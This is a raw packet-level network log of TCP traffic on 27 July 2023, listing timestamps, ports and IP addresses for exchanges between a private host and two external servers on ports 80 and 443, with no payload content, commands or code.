Jul 27, 2023 20:18:45.557749033 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557751894 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.557770014 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557790995 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557811022 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557821035 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.557831049 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557852983 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557859898 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.557876110 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557895899 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557900906 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.557919979 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557935953 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557950974 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557965994 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557980061 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558013916 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558141947 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.558358908 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558605909 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558656931 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558670044 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.558686018 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558706999 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558728933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558732986 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.558768988 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.558775902 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558902025 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558929920 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558950901 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.558952093 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558973074 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558993101 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.558996916 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.559014082 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559092045 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.559151888 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559173107 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559186935 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559205055 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559220076 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559226036 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.559241056 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559242010 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.559254885 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559276104 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559289932 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559309006 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559319973 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.559329987 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559338093 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.559350967 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559370041 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559375048 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.559391022 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559411049 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559417009 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.559432030 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559480906 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.559796095 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559823036 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559843063 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559855938 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.559865952 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559880018 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.559885979 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.559921026 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.570735931 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:46.724529028 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:46.724590063 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:46.740955114 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:46.741017103 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:46.759599924 CEST	49684	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:46.759659052 CEST	443	49684	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:46.759881973 CEST	49684	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:46.783054113 CEST	49684	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:46.783097982 CEST	443	49684	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:46.788233995 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:46.788295984 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:46.788449049 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:46.849582911 CEST	443	49684	162.0.217.254	192.168.2.4
Jul 27, 2023 20:18:46.849746943 CEST	49684	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:18:47.007333040 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.007333040 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.023721933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.023757935 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087368011 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087409019 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087430000 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087450981 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087471962 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087493896 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087512970 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.087516069 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087538004 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087542057 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.087558985 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087563992 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.087579966 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087600946 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087605953 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.087620974 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.087645054 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.091979980 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.108768940 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.108819962 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.108844995 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.108865023 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.108885050 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.108903885 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.109006882 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109028101 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109035015 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.109049082 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109051943 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.109070063 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109091997 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109093904 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.109112024 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109133005 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109137058 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.109153986 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109174967 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109195948 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109199047 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.109216928 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109220982 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.109237909 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109258890 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109261036 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.109280109 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109301090 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109302044 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.109319925 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109342098 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109343052 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.109361887 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109379053 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.109777927 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.141644955 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.141685963 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.141716003 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.141743898 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.141792059 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.141812086 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.141818047 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.141844034 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.141850948 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.141870975 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.141896009 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.141901970 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.141922951 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.141925097 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.141949892 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.141978025 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142004967 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142009020 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142030001 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142055988 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142060995 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142081976 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142083883 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142107964 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142133951 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142134905 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142153978 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142180920 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142193079 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142209053 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142235994 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142245054 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142262936 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142287016 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142313004 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142328978 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142340899 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142349958 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142368078 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142395973 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142421961 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142425060 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142448902 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142457962 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142474890 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142502069 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142515898 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142530918 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142556906 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142574072 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142584085 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142611027 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142637968 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142641068 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142663956 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142671108 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142690897 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142716885 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142745018 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142748117 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142770052 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142771959 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142796993 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142822981 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142849922 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142875910 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142878056 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.142899990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.142930984 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.148818016 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.153213024 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.175234079 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175292969 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175342083 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175389051 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175396919 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.175438881 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175446033 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.175487995 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175564051 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.175589085 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175637960 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175684929 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.175707102 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175754070 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175798893 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.175801992 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175849915 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175899029 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175945044 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.175949097 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.175997019 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176034927 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.176043034 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176090956 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176131010 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.176136971 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176184893 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176230907 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.176233053 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176275969 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.176305056 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176362038 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176410913 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176445007 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176455975 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.176479101 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176522017 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176536083 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.176619053 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176655054 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.176666021 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176707983 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.176712990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176764011 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176809072 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.176810980 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176857948 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176899910 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.176903963 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176954031 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.176980019 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.177000046 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177047968 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177088976 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.177097082 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177143097 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177167892 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.177187920 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177234888 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177282095 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177325010 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.177328110 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177345037 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.177375078 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177422047 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177467108 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.177469015 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177515030 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177561998 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177587986 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.177608967 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177650928 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.177671909 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177717924 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177751064 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.177767038 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177807093 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177855015 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177898884 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.177901030 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177941084 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.177949905 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.177998066 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178044081 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178056955 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.178091049 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178138018 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178179026 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.178185940 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178232908 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178275108 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.178278923 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178325891 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178337097 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.178373098 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178420067 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178462982 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.178467989 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178514957 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178555012 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.178563118 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178611040 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178617954 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.178658009 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178723097 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178767920 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.178770065 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178808928 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.178817034 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178864002 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178874969 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.178910017 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.178961039 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.179003954 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.179008961 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.179055929 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.179101944 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.179141998 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.179148912 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.179194927 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.179234028 CEST	49683	80	192.168.2.4	188.114.96.7
